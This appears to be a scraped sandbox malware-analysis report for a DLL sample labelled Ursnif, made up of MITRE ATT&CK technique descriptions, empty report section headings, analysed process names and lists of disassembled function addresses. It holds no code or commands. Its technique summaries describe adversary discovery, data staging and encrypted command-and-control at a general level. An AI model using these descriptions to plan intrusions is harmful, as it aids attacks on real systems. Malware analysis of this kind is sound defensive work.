Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report gg_1.gif.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6836 Parent PID: 2916

General

Chronological Activities

Analysis Process: cmd.exe PID: 6864 Parent PID: 6836

General

Chronological Activities

Analysis Process: rundll32.exe PID: 6908 Parent PID: 6836

Function 00EA5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 00EA709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Function 00EA1B1E, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Function 00EA3A14, Relevance: .9, Instructions: 925
COMMONCrypto

Function 00EA31B3, Relevance: .6, Instructions: 646
COMMONCrypto

Function 00EA3FAB, Relevance: .6, Instructions: 566
COMMONCrypto

Function 00EA1CD0, Relevance: .6, Instructions: 565
COMMONCrypto

Function 00EA43D8, Relevance: .4, Instructions: 371
COMMONCrypto

Function 00EA2FAF, Relevance: .2, Instructions: 210
COMMONCrypto

Function 00EA2A69, Relevance: .2, Instructions: 161
COMMONCrypto

Function 00EA150C, Relevance: .1, Instructions: 104
COMMONCrypto

Function 00EA1967, Relevance: .1, Instructions: 101
COMMONCrypto

Function 00EA510C, Relevance: .1, Instructions: 98
COMMONCrypto

Function 00EA88BA, Relevance: .1, Instructions: 95
COMMONCrypto

Function 00EA27D4, Relevance: .1, Instructions: 93
COMMONCrypto

Function 00EA13C5, Relevance: .1, Instructions: 90
COMMONCrypto

Function 00EA2566, Relevance: .1, Instructions: 84
COMMONCrypto

Function 00EA92B2, Relevance: .1, Instructions: 78
COMMONCrypto

Function 03465F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 0346709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Function 03305F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 0330709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON